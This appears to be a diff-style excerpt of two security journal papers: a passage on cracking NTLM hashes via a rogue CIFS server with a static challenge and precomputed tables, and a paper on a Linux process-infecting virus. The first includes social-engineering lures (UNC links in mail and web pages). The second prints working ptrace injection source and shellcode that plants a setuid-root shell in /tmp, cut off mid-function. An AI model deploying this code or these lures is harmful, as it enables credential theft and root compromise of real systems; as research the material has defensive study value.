||||
the second LM hash left. Those two, padded with 5 null bytes and used to
|
||||
encrypt the challenge, form the third 8 byte chunk of the NTLM hash.
|
||||
That means in the example this padded LM hash
|
||||
|
||||
|
||||
------------------------------------------------------
|
||||
| 0x1122AABBCCDDEE | FFAAD3B435B514 | 04EE0000000000 |
|
||||
------------------------------------------------------
|
||||
|
||||
|
||||
is being turned into the 24 byte NTLM hash. If the password is smaller
|
||||
than 8 characters in size, the third part, before being hashed with the
|
||||
challenge to form the NTLM hash, will always look like this. So in order
|
||||
to test wether the password is smaller than 8 bytes, it's enough to take
|
||||
this value, the 0x04EE0000000000, and use it to encrypt the challenge
|
||||
that got sniffed from the wire. If the result equals the third part of
|
||||
the NTLM hash which the client sent to the server, it's a pretty safe
|
||||
bet to say the password is no longer than 7 chars. It's even possible to
|
||||
make sure it is. Assuming from the previous result that the second LM
|
||||
hash looks like 0xAAD3B435B51404EE, the second chunk of the 24 byte NTLM
|
||||
hash is based on 0x??AAD3B435B514. The only part unknown is the first
|
||||
byte, as this one is based on the first LM hash. One byte, thats 256
|
||||
permutations. By brute forcing those up to 256 possibilities as the
|
||||
value of the first byte, and using the resulting key to encrypt the
|
||||
known challenge once again, one should eventually stumble over a result
|
||||
that's the same as the second 8 bytes of the NTLM hash. Now one can rest
|
||||
assured, that the password really is smaller than 8 bytes. Even if the
|
||||
password is bigger than 7 bytes, and the second LM hash does not end
|
||||
with 0x04EE thus, creating all possible 2 byte combinations, padding
|
||||
them with 5 null bytes and hashing those with the challenge until the
|
||||
final 8 byte chunk of the NTLM hash matches will easily reveal the final
|
||||
2 byte of the LM hash, with no more than up to 64k permutations.
|
||||
|
||||
2.3) The NTLM challenge
|
||||
|
||||
|
||||
The biggest difference between the way the LM and the NTLM hashing
|
||||
mechanism works is the challenge. In NTLM the challenge acts like a a
|
||||
salt in other cryptographic implementations. This throws a major wrench
|
||||
in our pre-computing table designs, adding 2^64 permutations to the
|
||||
equation.
|
||||
|
||||
3.0) Breaking NTLM with precomputed tables
|
||||
|
||||
3.1) Attacking the first part
|
||||
|
||||
Precomputing tables for NTLM has just been declared pretty much
|
||||
impossible with todays computing resources. The problem is pre-computing
|
||||
every possible hash value (and then, of course storing those values even
|
||||
if computation was possible). By applying a trick to remove the
|
||||
challenge from the equation however, precomputing NTLM hashes becomes
|
||||
almost as easy as the creation of LM tables. By writing a rogue CIFS
|
||||
server that hands out the same static challenge to every client that
|
||||
tries to connect to it, the problem has static values all over the place
|
||||
once again, and hashtable precomputation becomes possible.
|
||||
|
||||
The following screenshot depicts a proof of concept implementation that
|
||||
accepts an incoming CIFS connection, goes through the protocol
|
||||
negotiation phase with the connecting client, sends out the static
|
||||
challenge, and disconnects the client after receiving username and NTLM
|
||||
hash from it. The server also logs some more information that the client
|
||||
conveniently sends along.
|
||||
|
||||
|
||||
IceDragon wincatch bin/wincatch
|
||||
This is Alpha stage code from nologin.org
|
||||
Distribution in any form is denied
|
||||
|
||||
|
||||
Src Name: BARRIERICE
|
||||
IP: 192.168.7.13
|
||||
Username: Testuser
|
||||
Primary Domain: BARRIERICE
|
||||
Native OS: Windows 2002 Service Pack 2 2600
|
||||
Long Password Hash: 3c19dcbdb400159002d8d5f8626e814564f3649f0f918666
|
||||
|
||||
|
||||
That's a Windows XP machine connecting to the rogue server running
|
||||
on Linux. The client is connecting from IP address 192.168.7.13. The
|
||||
username is ``Testuser'', the name of the host is ``BarrierIce'',
|
||||
and the password hash got captured too of course.
|
||||
|
||||
3.2) Table creation
|
||||
|
||||
|
||||
The creation of rainbow tables to precompute the hashes is a good
|
||||
approach to easily breaking the hashes now, but as harddisks grow bigger
|
||||
and bigger while costing ever less, I decided to roll my own table
|
||||
layout instead. As the reader will see, my approach requires way more
|
||||
harddisk space than rainbow tables do since they are computationally
|
||||
less expensive to create and contain a determined set of data, unlike
|
||||
rainbow tables with their less than 100 probability approach to contain
|
||||
a certain password.
|
||||
|
||||
In order to create those tables, the big question is how to efficiently
|
||||
store all the data. In order to stay within certain bounds, I decided to
|
||||
stick to alphanumeric tables only. Alphanumeric, that's 26 chars from
|
||||
a-z, 26 chars from A-Z, and additional 10 for 0-9. Thats 62 possible
|
||||
values for each character, so thats 62^7 permutations, right? Wrong.
|
||||
NTLM hashes use the LM hash as input. The LM hashing algorithm
|
||||
upper-cases its input. Therefore the possible keyspace shrinks to 36
|
||||
characters, and the number of possible permutations goes down to 36^7.
|
||||
The only other input that needs accounting is the NULL padding bytes
|
||||
used, bringing the total permutations to a bit more than 36^7.
|
||||
|
||||
The approach taken here to allow for easy storage and recovery of hashes
|
||||
and plain text is essentially to place every possible plaintext password
|
||||
into one of 2048 buckets. It could easily be expanded to more. The table
|
||||
creation tool simply generates every valid alphanumeric password, hashes
|
||||
it and checks the first 11 bits of the hash. These bits determine which
|
||||
of the 2048 buckets (implemented as files in this case) the plaintext
|
||||
password belongs to. The plaintext password is then added to the bucket.
|
||||
Now whenever a hash is captured, looking at the first 11 bits of the
|
||||
hash determines the correct bucket to look into for the password. All
|
||||
that's left to do now is hashing all the passwords in the bucket until a
|
||||
match is found. This will take on average case ((36^7)/2048))/2, or
|
||||
19131876 hash operations. This takes approximately three minutes on my
|
||||
Pentium 4 2.8 Ghz machine. It takes the NTLM table generation tool 94
|
||||
hours to run on my machine. Fortunately, I only had to do that once :)
|
||||
|
||||
The question is how to store more than 36^7 plaintext passwords, ranging
|
||||
in size from 0(empty password) to 7 bytes.
|
||||
|
||||
Approach 1: Store each password separated by newlines. As most passwords
|
||||
are 7 byte in size and an additional newline extends that to 8 byte, the
|
||||
outcome would be somewhere around (36^7)*8 bytes. That's roughly 584
|
||||
gigabytes, for the alphanumeric keyspace. There has to be a better way.
|
||||
|
||||
Approach 2: By storing each password with 7 bytes, be it shorter than 7
|
||||
or not, the average space required for each password goes down from 8 to
|
||||
7, as it's possible to get rid of the newlines. There's no need to
|
||||
separate passwords by newlines if they're all the same size. (36^7)*7 is
|
||||
still way too much though.
|
||||
|
||||
Approach 3: The plaintext passwords are generated by 7 nested loops. The
|
||||
first character changes all the time. The second character changes every
|
||||
time the first has exhausted the entire keyspace. The third increments
|
||||
each time the second has exhausted the keyspace and so on. What's
|
||||
interesting is that the final 3 bytes rarely change. By storing them
|
||||
only when they change, it's possible to store only the first 4 bytes of
|
||||
each password, and once in a while a marker that signals a change in the
|
||||
final 3 bytes, and is followed by the 3 byte that now form the end of
|
||||
each plaintext password up to the next marker. That's roughly (36^7)*4
|
||||
bytes = 292 gigabytes. Much better. Still too much.
|
||||
|
||||
Approach 4: For each character, there's 37 possible values. A-Z, 0-9 and
|
||||
the 0 byte. 37 different values can be expressed by 6 bits. So we can
|
||||
stuff 4 characters into 4*6 = 24 bits, which is 3 byte. How convenient!
|
||||
(37^7)*3 == 265 gigabytes. Still too much.
|
||||
|
||||
Approach 5: The passwords are being generated and stored in a
|
||||
consecutive way. The hash determines which bucket to place each new
|
||||
plaintext password into, but it's always 'bigger' than the previous one.
|
||||
Using 2048 buckets, a test showed that, within any one file, no offset
|
||||
between a password being stored and the next one stored into this bucket
|
||||
exceeded 55000. By storing offsets to the previous password instead of
|
||||
the full word, each password can be stored as a 2 byte value.
|
||||
|
||||
For example, say the first password stored into one bucket is the one
|
||||
char word "A". That's index 10 in the list of possible characters, as it
|
||||
starts with 0-9. The table creation tool would now save 10 into the
|
||||
bucket, as it's the first index from the start of the new bucket, and
|
||||
it's 10 bigger than zero, the start value for each bucket. Now if by
|
||||
chance the one character password "C" was to be stored into the same
|
||||
bucket next, the number 2 would be stored, as "C" has an offset of 2 to
|
||||
the previous password. If the next password for this bucket was "JH6",
|
||||
the offset might be 31337.
|
||||
|
||||
Basically each password is being stored in a base36 system, so the first
|
||||
2 byte password, being "00", has an index of 37, and all the previous
|
||||
password offsets and the offset for "00" itself of the bucket that "00"
|
||||
is being stored in add up to 37. To retrieve a password saved in this
|
||||
way requires a transformation of the decimal index back into the base36
|
||||
system, and using the resulting individual numbers as indexes into the
|
||||
char keyspace[].
|
||||
|
||||
The resulting table size is (36^7 )*2 == 146 gigabytes. Still pretty
|
||||
big, but small enough to easily fit on today's harddisks. As I mentioned
|
||||
earlier the actual resulting size is a bit bigger in fact, as a bunch of
|
||||
passwords that end with null bytes have to be stored too. In the end
|
||||
it's not 146 gigabytes, but 151 instead.
|
||||
|
||||
3.3) The big problem
|
||||
|
||||
|
||||
Now there's a big problem concerning the creation of the NTLM lookup
|
||||
tables. The first 8 byte of the final hash are derived from the first 7
|
||||
byte of the LM hash, which are derived from the first 7 byte of the
|
||||
plaintext password. Creating tables to match the first 8 byte of the
|
||||
NTLM hash to the first 7 bytes of the password is thus possible, but the
|
||||
same tables do not work for the second or even third block of the 24
|
||||
byte NTLM hash.
|
||||
|
||||
The second 8 byte chunk of the hash is derived from the last byte of the
|
||||
first LM hash, and the first 6 byte of the second LM hash. This first
|
||||
byte adds 256 possible values to the second LM hash. While the first 8
|
||||
byte chunk of the 24 byte LM hash stems purely from a LM hash of a
|
||||
plaintext password, the second 8 byte chunk stems from an undetermined
|
||||
byte and additional 6 byte of a LM hash.
|
||||
|
||||
Being able to look up the first up to 7 bytes of the password is a big
|
||||
advantage already though. The second part of the password, if it's
|
||||
longer than 7 bytes at all, can now usually be easily guessed or brute
|
||||
forced. Having determined that the password starts with "ILLUSTR" for
|
||||
example, most often it may end with "ATION" or "ATOR". On the other
|
||||
hand, when applying the brute force approach to this example after
|
||||
looking up the first 7 bytes, it'd require to brute force 4-5 characters
|
||||
until the final password is revealed. Even off-the-shelf hardware does
|
||||
this in seconds. While taking a bit longer, even brute forcing 6 bytes
|
||||
is nothing one couldn't sit out. 7 bytes, however, requires an
|
||||
inconvenient amount of time. That's where being able to look that part
|
||||
up as well would really come in handy. Well, guess what. There is a way.
|
||||
|
||||
3.4) Breaking the second part of the password
|
||||
|
||||
|
||||
As described earlier in this paper, the second part of the password,
|
||||
just as the first one, is used to encrypt a known string to form an 8
|
||||
byte LM hash. Knowing the challenge sent from the server to the client,
|
||||
it is possible to deduce the final 2 bytes of that LM hash out of the
|
||||
third chunk of the NTLM hash. Doing so was explained in section 2.2.
|
||||
|
||||
So the final 2 byte of the LM hash of the second half of the original
|
||||
password are known. If a similar approach to breaking the first half of
|
||||
the password is being applied now, looking up the second part of the
|
||||
password as well becomes quite possible.
|
||||
|
||||
The key here is to create a set of precomputed LanMan tables that are
|
||||
sorted by the final 2 bytes of the LM hash. So once the final 2 byte of
|
||||
the LM hash are known, a file is thus identified that contains plaintext
|
||||
passwords that when hashed result in a matching 2 byte sequence at the
|
||||
end.
|
||||
|
||||
The second chunk of the NTLM hash is derived from 6 bytes that are the
|
||||
start of the hash of one of the plaintext passwords out of the file that
|
||||
just got identified, and a single byte, the first one, which is the
|
||||
final byte of the first LM hash.
|
||||
|
||||
Considering the first part of the password broken, that byte is known.
|
||||
So all that's left to do is hash all the possible passwords in the file,
|
||||
fit the single known byte into the first position of a string and
|
||||
concatenate this one with 6 bytes from the just created hash, hashing
|
||||
those 7 bytes again and comparing the result to the second chunk of the
|
||||
NTLM hash. If it matches, the second part of the password has been
|
||||
broken too.
|
||||
|
||||
Even if looking up the first part of the password didn't prove
|
||||
successful, the method may still be applied. The only change would be
|
||||
that up to 256 possible values for the first byte would have to be
|
||||
computed and tested as well.
|
||||
|
||||
What's really interesting to note here, is that the second set of
|
||||
tables, the sorted LM tables, unlike the first set of NTLM tables, does
|
||||
NOT depend on a certain challenge. It will work with just any challenge,
|
||||
which is usually sniffed or aquired from the wire when the password hash
|
||||
and the username are being taken.
|
||||
|
||||
4) How to get the victim to log into the rogue server?
|
||||
|
||||
The big question to answer is how one can get the victim to log into the
|
||||
rogue server, thus exposing his username and password hash for the
|
||||
attacker to break.
|
||||
|
||||
Approach 1: Sending a html mail that includes a link in the form of a
|
||||
UNC path should do the trick, depending primarily on the sender's
|
||||
rhetoric ability in getting his victim to click the link, and the mail
|
||||
client to understand what it's expected to do. A UNC path is usually in
|
||||
the form of 192.168.7.6share, where the IP address obviously specifies
|
||||
the host to connect to, and ``share'' is a shared resource on that host.
|
||||
Due to Microsoft always being concerned about comfort first, the
|
||||
following will happen once the victim clicks the link on a Windows
|
||||
machine. The OS will try to log into the specified resource. When asked
|
||||
for a username and password, the client happily provides the current
|
||||
user's username and his hashed password to the server in an effort to
|
||||
try to log in with these credentials. No user interaction required. No
|
||||
joke.
|
||||
|
||||
Approach 2: Getting the victim to visit a site that includes a UNC path
|
||||
with Internet Explorer has the same result. An image tag like will do
|
||||
the trick. IE will make Windows try to log into the resource in order to
|
||||
get the image. Again, no user interaction is required. This trick does
|
||||
not work with Mozilla Firefox by the way.
|
||||
|
||||
Approach 3: If the rogue server is part of the LAN, advertising it in
|
||||
the network neighbourhood as "warez, porn, mp3, movie" - server should
|
||||
result in users trying to log into it sooner or later. There's no way
|
||||
anyone can withstand the power of the 4 elements!
|
||||
|
||||
There's plenty of other ways that the author leaves to the readers
|
||||
imagination.
|
||||
|
||||
5) Things to remember
|
||||
|
||||
|
||||
Once a hash has been received and successfully broken, it may still not
|
||||
be the correct password, and accordingly not allow the attacker to log
|
||||
into his victims machine. That's due to the password being hashed all
|
||||
uppercase for LM, while the MD4 based second hash actually is case
|
||||
sensitive. So a hash that's been deciphered as being "WELCOME" may
|
||||
originally have been "Welcome" or "welcome" or even "wELCOME" or
|
||||
"WeLcOme" or .. well, you get the idea. Then again, how many users
|
||||
actually apply uncommon spelling schemes?
|
||||
|
||||
6) Covering it up
|
||||
|
||||
|
||||
Having read this paper the reader should by now realize that NTLM,
|
||||
an authentication mechanism that probably most computers on this
|
||||
planet support, is actually a big threat to hosts and entire
|
||||
networks. Especially with the recently discovered remote Windows
|
||||
exploits that require valid accounts on the victim machines for the
|
||||
attacker to log into first, a worm that makes people visit a
|
||||
website, which in turn makes them log into a rogue server that
|
||||
breaks the hash and automatically exploits the victim is a
|
||||
frightening threat scenario.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
Windows NT rantings from the L0pht
|
||||
http://www.packetstormsecurity.org/Crackers/NT/l0phtcrack/l0phtcrack.rant.nt.passwd.txt
|
||||
|
||||
Making a Faster Cryptanalytic Time-Memory Trade-Off
|
||||
http://lasecwww.epfl.ch/ oechslin/publications/crypto03.pdf
|
561
uninformed/3.5.txt
Normal file
561
uninformed/3.5.txt
Normal file
|
@ -0,0 +1,561 @@
|
|||
Linux Improvised Userland Scheduler Virus
|
||||
Izik
|
||||
izik@tty64.org
|
||||
Last modified: 12/29/2005
|
||||
|
||||
1) Introduction
|
||||
|
||||
This paper discusses the combination of a userland scheduler and
|
||||
runtime process infection for a virus. These two concepts complete
|
||||
each other. The runtime process infection opens the door to invading
|
||||
into other processes, and the userland scheduler provides a way to
|
||||
make the injected code coexist with the original process code. This
|
||||
allows the virus to remain stealthy and active inside an infected
|
||||
process.
|
||||
|
||||
|
||||
2) Scheduler, Who?
|
||||
|
||||
A scheduler, in particular a process scheduler is a kernel component
|
||||
that selects which process to run next. The scheduler is the basis
|
||||
of a multitasking operating system such as Linux. By deciding what
|
||||
process can run, the scheduler is responsible for utilizing the
|
||||
system the best way and giving the impression that multiple
|
||||
processes are simultaneously executing. A good example of using the
|
||||
scheduler in a virus, is when the fork() syscall is used to
|
||||
spawn a child process for the virus to run in. But fork()
|
||||
puts the child process out, thus it appears in the system process
|
||||
list and could attract attention.
|
||||
|
||||
|
||||
3) Userland Scheduler
|
||||
|
||||
An userland scheduler, as opposed to the kernel scheduler, runs
|
||||
inside an application scope and deals with the application threads
|
||||
and processes. The userland scheduler is still subject to the kernel
|
||||
scheduler and meant to improve the application multi-threads
|
||||
management. One of the major tasks that the scheduler performs is
|
||||
context switching. Taking airtime from one thread to another.
|
||||
Improvising a userland scheduler inside an infected process will
|
||||
give the option of switching from the original process to the virus
|
||||
and back, without attracting too much attention on the way.
|
||||
|
||||
|
||||
4) Improvising a Userland Scheduler
|
||||
|
||||
An application that does implement a userland scheduler in it,
|
||||
provides the functions and support to do so in the code. This is a
|
||||
privilege that a virus could not easily implement smoothly. So
|
||||
improvising takes places. This raises two major problems: how and
|
||||
when. How to perform the context switching task within a code that
|
||||
has no previous support, and when the userland scheduler code can
|
||||
run to begin supervising this in the first place.
|
||||
|
||||
There are a few ways to do it. For example putting a hook on a
|
||||
function is one way. Once the program will call the function that
|
||||
has been hooked, the virus will activate and afterwards return control
|
||||
to the program. But it's not an ideal solution as there is no
|
||||
guarantee that the program will continue using it, and for how often
|
||||
or long. In order to get a wider scope that could cover the entire
|
||||
program, signals could be used.
|
||||
|
||||
Looking at the signal mechanism in Linux, it's similar to the
|
||||
interrupts mechanism, in the way that that the kernel allows a
|
||||
program to process a signal within any place in the program code
|
||||
without any special preparation and resume back to the program flow
|
||||
once the signal handler function is done. It gives a very good way
|
||||
to perform context switching with little effort. This answers the
|
||||
"how" question, in how to perform the context switching task, using
|
||||
the signal handler function as the base function of the virus which
|
||||
will be invoked while the SIGALRM signal will be processed.
|
||||
|
||||
Adopting the signal model to our needs is supported by the
|
||||
alarm() syscall. The alarm() syscall allows the
|
||||
process to schedule the alarm signal (SIGALRM) to be
|
||||
delivered, thus making it kernel responsibility. Having the kernel
|
||||
constantly delivering a signal to the process hosting the virus,
|
||||
saves the virus the effort of doing it. This answers the when
|
||||
question for when the userland scheduler code would run. Using the
|
||||
alarm() syscall to schedule a SIGALRM to be
|
||||
delivered to the process, that in turn will call the virus function.
|
||||
This code demonstrates the functionality of alarm() and
|
||||
SIGALRM:
|
||||
|
||||
/*
|
||||
* sigalrm-poc.c, SIGALRM Proof of Concept
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <signal.h>
|
||||
|
||||
// SIGALRM Handler
|
||||
|
||||
void shapebreaker(int ignored) {
|
||||
|
||||
// Break the cycle
|
||||
|
||||
printf("\nX\n");
|
||||
|
||||
// Schedule another one
|
||||
|
||||
alarm(5);
|
||||
|
||||
return ;
|
||||
}
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
|
||||
int shape_selector = 0;
|
||||
char shape;
|
||||
|
||||
// Register for SIGALRM
|
||||
|
||||
if (signal(SIGALRM, shapebreaker) < 0) {
|
||||
perror("signal");
|
||||
return -1;
|
||||
}
|
||||
|
||||
// Schedule SIGALRM for 5 secs
|
||||
|
||||
alarm(5);
|
||||
|
||||
while(1) {
|
||||
// Shape selector
|
||||
|
||||
switch (shape_selector % 2) {
|
||||
|
||||
case 0:
|
||||
shape = '.';
|
||||
break;
|
||||
|
||||
case 1:
|
||||
shape = 'o';
|
||||
break;
|
||||
|
||||
case 2:
|
||||
shape = 'O';
|
||||
break;
|
||||
}
|
||||
|
||||
// Print given shape
|
||||
|
||||
printf("%c\r", shape);
|
||||
|
||||
// Incerase shape index
|
||||
|
||||
shape_selector++;
|
||||
|
||||
}
|
||||
|
||||
// NEVER REACHED
|
||||
|
||||
return 1;
|
||||
}
|
||||
|
||||
The program concept is pretty simple, it prints a char from a loop,
|
||||
selecting the char via an index variable. Every five seconds or so,
|
||||
a SIGALRM is being scheduled to be delivered using the
|
||||
alarm() syscall. Once the signal has been processed the
|
||||
signal handler, which is the shapebreaker() function in
|
||||
this case, is being called and is breaking the char sequence.
|
||||
Afterwards the program continues as if nothing happened. From within
|
||||
the signal handler function, a virus can operate and once it
|
||||
returns, the program will continue flawlessly.
|
||||
|
||||
|
||||
5) Runtime Process Infection
|
||||
|
||||
Runtime infection is done using the notorious ptrace()
|
||||
syscall, which allows a process to attach to another process,
|
||||
assuming of course, that it has root privileges or has a
|
||||
father-child relationship with some exceptions to it. Once the
|
||||
attached process gets into debugging mode, it is possible to modify
|
||||
its registers and write/read from its address space. These are
|
||||
features that are required to slip in the virus code and activate
|
||||
it. For an in-depth review of the ptrace() injection
|
||||
method, refer to the "Building ptrace Injecting Shellcodes" article
|
||||
in Phrack 59[1].
|
||||
|
||||
5.1) The Algorithm
|
||||
|
||||
Having the motives, tools and knowledge, here's the plan:
|
||||
|
||||
Infector:
|
||||
---------
|
||||
|
||||
* Attach to process
|
||||
> Wait for process to stop
|
||||
> Query process registers
|
||||
> Calculate previous stack page beginning
|
||||
> Store current EIP
|
||||
> Inject pre-virus and virus code
|
||||
> Set EIP to pre-virus code
|
||||
> Deattach from process
|
||||
|
||||
Pre-Virus:
|
||||
----------
|
||||
|
||||
* Register SIGALRM signal
|
||||
> Schedule SIGALRM (14secs)
|
||||
> Give control back to process
|
||||
|
||||
Virus:
|
||||
------
|
||||
|
||||
* SIGALRM handler invoked
|
||||
> Check for /tmp/fluffy
|
||||
> Create fluffy.c
|
||||
> Compile fluffy.c
|
||||
> Remove /tmp/fluffy.c
|
||||
> Chmod /tmp/fluffy
|
||||
> Jmp to pre-virus code
|
||||
|
||||
The infecting process is divided into two steps, the infector
|
||||
injects the virus and the pre-virus code to the infected process.
|
||||
Afterward it sets the process EIP to point to the pre-virus
|
||||
code. This independently registers to the SIGALRM signal
|
||||
within the infected process and calculates the virus location for
|
||||
the signal callback function. Then it schedules a SIGALRM
|
||||
signal and passes the control back to the process. Once the signal
|
||||
caught the virus it kicks in as the signal handler.
|
||||
|
||||
|
||||
5.2) Meet Fluffy
|
||||
|
||||
A code that implements the above theory:
|
||||
|
||||
/*
|
||||
* x86-fluffy-virus.c, Fluffy virus / izik@tty64.org
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <string.h>
|
||||
#include <sys/ptrace.h>
|
||||
#include <sys/wait.h>
|
||||
#include <linux/user.h
|
||||
#include <linux/ptrace.h>
|
||||
|
||||
char virus_shcode[] =
|
||||
|
||||
// <_start>:
|
||||
|
||||
"\x90" // nop
|
||||
"\x90" // nop
|
||||
"\x60" // pusha
|
||||
"\x9c" // pushf
|
||||
"\x31\xc0" // xor %eax,%eax
|
||||
"\x31\xdb" // xor %ebx,%ebx
|
||||
"\xb0\x30" // mov $0x30,%al
|
||||
"\xb3\x0e" // mov $0xe,%bl
|
||||
"\xeb\x06" // jmp <_geteip>
|
||||
|
||||
// <_calc_eip>:
|
||||
|
||||
"\x59" // pop %ecx
|
||||
"\x83\xc1\x0d" // add $0xd,%ecx
|
||||
"\xeb\x05" // jmp <_continue>
|
||||
|
||||
// <_geteip>:
|
||||
|
||||
"\xe8\xf5\xff\xff\xff" // call <_calc_eip>
|
||||
|
||||
// <_continue>:
|
||||
|
||||
"\xcd\x80" // int $0x80
|
||||
"\x85\xc0" // test %eax,%eax
|
||||
"\x75\x04" // jne <_resumeflow>
|
||||
"\xb0\x1b" // mov $0x1b,%al
|
||||
"\xcd\x80" // int $0x80
|
||||
|
||||
// <_resumeflow>:
|
||||
|
||||
"\x9d" // popf
|
||||
"\x61" // popa
|
||||
"\xc3" // ret
|
||||
|
||||
// <_virus>:
|
||||
|
||||
"\x55" // push %ebp
|
||||
"\x89\xe5" // mov %esp,%ebp
|
||||
"\x31\xc0" // xor %eax,%eax
|
||||
"\x31\xc9" // xor %ecx,%ecx
|
||||
"\xeb\x57" // jmp <_data_jmp>
|
||||
|
||||
// <_chkforfluffy>:
|
||||
|
||||
"\x5e" // pop %esi
|
||||
|
||||
// <_fixnulls>:
|
||||
|
||||
"\x3a\x46\x07" // cmp 0x7(%esi),%al
|
||||
"\x74\x0b" // je <_access>
|
||||
"\xfe\x46\x07" // incb 0x7(%esi)
|
||||
"\xfe\x46\x0a" // incb 0xa(%esi)
|
||||
"\xb0\xb3" // mov $0xb3,%al
|
||||
"\xfe\x04\x06" // incb (%esi,%eax,1)
|
||||
|
||||
// <_access>:
|
||||
|
||||
"\xb0\xa8" // mov $0xa8,%al
|
||||
"\x8d\x1c\x06" // lea (%esi,%eax,1),%ebx
|
||||
"\xb0\x21" // mov $0x21,%al
|
||||
"\xb1\x04" // mov $0x4,%cl
|
||||
"\xcd\x80" // int $0x80
|
||||
"\x85\xc0" // test %eax,%eax
|
||||
"\x74\x31" // je <_schedule>
|
||||
|
||||
// <_fork>:
|
||||
|
||||
"\x01\xc8" // add %ecx,%eax
|
||||
"\xcd\x80" // int $0x80
|
||||
"\x85\xc0" // test %eax,%eax
|
||||
"\x75\x1f" // jne <_waitpid>
|
||||
|
||||
// <_exec>:
|
||||
|
||||
"\x31\xd2" // xor %edx,%edx
|
||||
"\xb0\x17" // mov $0x17,%al
|
||||
"\x31\xdb" // xor %ebx,%ebx
|
||||
"\xcd\x80" // int $0x80
|
||||
"\xb0\x0b" // mov $0xb,%al
|
||||
"\x89\xf3" // mov %esi,%ebx
|
||||
"\x52" // push %edx
|
||||
"\x8d\x7e\x0b" // lea 0xb(%esi),%edi
|
||||
"\x57" // push %edi
|
||||
"\x8d\x7e\x08" // lea 0x8(%esi),%edi
|
||||
"\x57" // push %edi
|
||||
"\x56" // push %esi
|
||||
"\x89\xe1" // mov %esp,%ecx
|
||||
"\xcd\x80" // int $0x80
|
||||
"\x31\xc0" // xor %eax,%eax
|
||||
"\x40" // inc %eax
|
||||
"\xcd\x80" // int $0x80
|
||||
|
||||
// <_waitpid>:
|
||||
|
||||
"\x89\xc3" // mov %eax,%ebx
|
||||
"\x31\xc0" // xor %eax,%eax
|
||||
"\x31\xc9" // xor %ecx,%ecx
|
||||
"\xb0\x07" // mov $0x7,%al
|
||||
"\xcd\x80" // int $0x80
|
||||
|
||||
// <_schedule>:
|
||||
|
||||
"\xc9" // leave
|
||||
"\xe9\x7c\xff\xff\xff" // jmp <_start>
|
||||
|
||||
// <_data_jmp>:
|
||||
|
||||
"\xe8\xa4\xff\xff\xff" // call <_chkforfluffy>
|
||||
|
||||
//
|
||||
// /bin/sh\xff-c\xff
|
||||
// echo "int main() { setreuid(0, 0); system(\"/bin/bash\"); return 1; }" > /tmp/fluffy.c ;
|
||||
// cc -o /tmp/fluffy /tmp/fluffy.c ;
|
||||
// rm -rf /tmp/fluffy.c ;
|
||||
// chmod 4755 /tmp/fluffy\xff
|
||||
//
|
||||
|
||||
// <_data_sct>:
|
||||
|
||||
"\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x65\x63\x68\x6f\x20"
|
||||
"\x22\x69\x6e\x74\x20\x6d\x61\x69\x6e\x28\x29\x20\x7b\x20\x73\x65"
|
||||
"\x74\x72\x65\x75\x69\x64\x28\x30\x2c\x20\x30\x29\x3b\x20\x73\x79"
|
||||
"\x73\x74\x65\x6d\x28\x5c\x22\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
|
||||
"\x5c\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x31\x3b\x20\x7d"
|
||||
"\x22\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e"
|
||||
"\x63\x20\x3b\x20\x63\x63\x20\x2d\x6f\x20\x2f\x74\x6d\x70\x2f\x66"
|
||||
"\x6c\x75\x66\x66\x79\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66"
|
||||
"\x79\x2e\x63\x20\x3b\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x74\x6d"
|
||||
"\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e\x63\x20\x3b\x20\x63\x68\x6d"
|
||||
"\x6f\x64\x20\x34\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75"
|
||||
"\x66\x66\x79\xff";
|
||||
|
||||
int ptrace_inject(pid_t, long, void *, int);
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
|
||||
pid_t pid;
|
||||
struct user_regs_struct regs;
|
||||
long infproc_addr;
|
||||
|
||||
if (argc < 2) {
|
||||
printf("usage: %s <pid>\n", argv[0]);
|
||||
return -1;
|
||||
}
|
||||
|
||||
pid = atoi(argv[1]);
|
||||
|
||||
// Attach to the process
|
||||
|
||||
if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) < 0) {
|
||||
perror(argv[1]);
|
||||
return -1;
|
||||
}
|
||||
|
||||
// Wait for a process to stop
|
||||
|
||||
if (waitpid(pid, NULL, 0) < 0) {
|
||||
perror(argv[1]);
|
||||
ptrace(PTRACE_DETACH, pid, NULL, NULL);
|
||||
return -1;
|
||||
}
|
||||
|
||||
// Query process registers
|
||||
|
||||
if (ptrace(PTRACE_GETREGS, pid, ®s, ®s) < 0) {
|
||||
perror("Oopsie");
|
||||
ptrace(PTRACE_DETACH, pid, NULL, NULL);
|
||||
return -1;
|
||||
}
|
||||
|
||||
printf("Original ESP: 0x%.8lx\n", regs.esp);
|
||||
printf("Original EIP: 0x%.8lx\n", regs.eip);
|
||||
|
||||
// Push original EIP on stack for virus to RET
|
||||
|
||||
regs.esp -= 4;
|
||||
|
||||
ptrace(PTRACE_POKETEXT, pid, regs.esp, regs.eip);
|
||||
|
||||
// Calculate the previous stack page top address
|
||||
|
||||
infproc_addr = (regs.esp & 0xFFFFF000) - 0x1000;
|
||||
|
||||
printf("Injection Base: 0x%.8lx\n", infproc_addr);
|
||||
|
||||
// Inject virus code
|
||||
|
||||
if (ptrace_inject(pid, infproc_addr, virus_shcode, sizeof(virus_shcode) - 1) < 0) {
|
||||
return -1;
|
||||
}
|
||||
|
||||
// Change EIP to point over virus shcode
|
||||
|
||||
regs.eip = infproc_addr + 2;
|
||||
|
||||
printf("Current EIP: 0x%.8lx\n", regs.eip);
|
||||
|
||||
// Set process registers (EIP changed)
|
||||
|
||||
if (ptrace(PTRACE_SETREGS, pid, ®s, ®s) < 0) {
|
||||
perror("Oopsie");
|
||||
ptrace(PTRACE_DETACH, pid, NULL, NULL);
|
||||
return -1;
|
||||
}
|
||||
|
||||
// It's fluffy time!
|
||||
|
||||
